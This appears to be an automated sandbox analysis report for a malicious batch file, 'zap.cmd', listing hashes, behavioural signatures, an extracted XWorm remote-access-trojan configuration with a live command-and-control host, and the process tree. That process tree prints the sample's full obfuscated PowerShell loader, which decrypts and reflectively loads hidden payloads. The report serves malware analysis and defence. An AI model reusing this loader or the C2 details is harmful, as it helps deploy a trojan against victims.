Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 16:26
Static task
static1
Behavioral task
behavioral1
Sample
zap.cmd
Resource
win7-20240220-en
General
-
Target
zap.cmd
-
Size
65KB
-
MD5
85c9311ae0014ac8bb98089d0bd51bdc
-
SHA1
5140e9beda6014b02df3c09f84a284f9c25532ca
-
SHA256
152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5
-
SHA512
f202a1e07afb444e5264cd28f7c0eedd55a3d002d14f989bf9fb065fd451be1df6197b5dcb61c616e8dbd1d3ba43cdc058192c89858c8bc292c199d5e8e9fb54
-
SSDEEP
768:std2pH1E6G5dMQzfwXLyVM0rAQiB/tp6UTGKxHHVpMGgJxhvtsQekLpzmWnfCB3Q:fpH1E6YrfDSF+UaaLtE1sQeAJ2Zlg9
Malware Config
Extracted
xworm
5.0
hjxwrm5.duckdns.org:8896
MSmkrgH8xVI2Dczk
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4776-30-0x0000019D69D60000-0x0000019D69D70000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 27 4776 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 4776 powershell.exe 3100 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 4776 powershell.exe 4776 powershell.exe 3100 powershell.exe 3100 powershell.exe 4776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4776 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4776 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 3684 wrote to memory of 4892 3684 cmd.exe cmd.exe PID 3684 wrote to memory of 4892 3684 cmd.exe cmd.exe PID 3684 wrote to memory of 4548 3684 cmd.exe cmd.exe PID 3684 wrote to memory of 4548 3684 cmd.exe cmd.exe PID 4548 wrote to memory of 2056 4548 cmd.exe cmd.exe PID 4548 wrote to memory of 2056 4548 cmd.exe cmd.exe PID 4548 wrote to memory of 4268 4548 cmd.exe cmd.exe PID 4548 wrote to memory of 4268 4548 cmd.exe cmd.exe PID 4548 wrote to memory of 4776 4548 cmd.exe powershell.exe PID 4548 wrote to memory of 4776 4548 cmd.exe powershell.exe PID 4776 wrote to memory of 3100 4776 powershell.exe powershell.exe PID 4776 wrote to memory of 3100 4776 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\zap.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfdgqn0s.dxo.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/4776-14-0x0000019D69FA0000-0x0000019D6A016000-memory.dmpFilesize
472KB
-
memory/4776-10-0x0000019D696D0000-0x0000019D696F2000-memory.dmpFilesize
136KB
-
memory/4776-11-0x00007FFE39C20000-0x00007FFE3A6E1000-memory.dmpFilesize
10.8MB
-
memory/4776-12-0x00007FFE39C20000-0x00007FFE3A6E1000-memory.dmpFilesize
10.8MB
-
memory/4776-13-0x0000019D69D70000-0x0000019D69DB4000-memory.dmpFilesize
272KB
-
memory/4776-0-0x00007FFE39C23000-0x00007FFE39C25000-memory.dmpFilesize
8KB
-
memory/4776-26-0x0000019D69D40000-0x0000019D69D52000-memory.dmpFilesize
72KB
-
memory/4776-27-0x00007FFE57BB0000-0x00007FFE57DA5000-memory.dmpFilesize
2.0MB
-
memory/4776-28-0x00007FFE57100000-0x00007FFE571BE000-memory.dmpFilesize
760KB
-
memory/4776-29-0x0000019D69D50000-0x0000019D69D5C000-memory.dmpFilesize
48KB
-
memory/4776-30-0x0000019D69D60000-0x0000019D69D70000-memory.dmpFilesize
64KB
-
memory/4776-32-0x00007FFE39C23000-0x00007FFE39C25000-memory.dmpFilesize
8KB
-
memory/4776-33-0x00007FFE39C20000-0x00007FFE3A6E1000-memory.dmpFilesize
10.8MB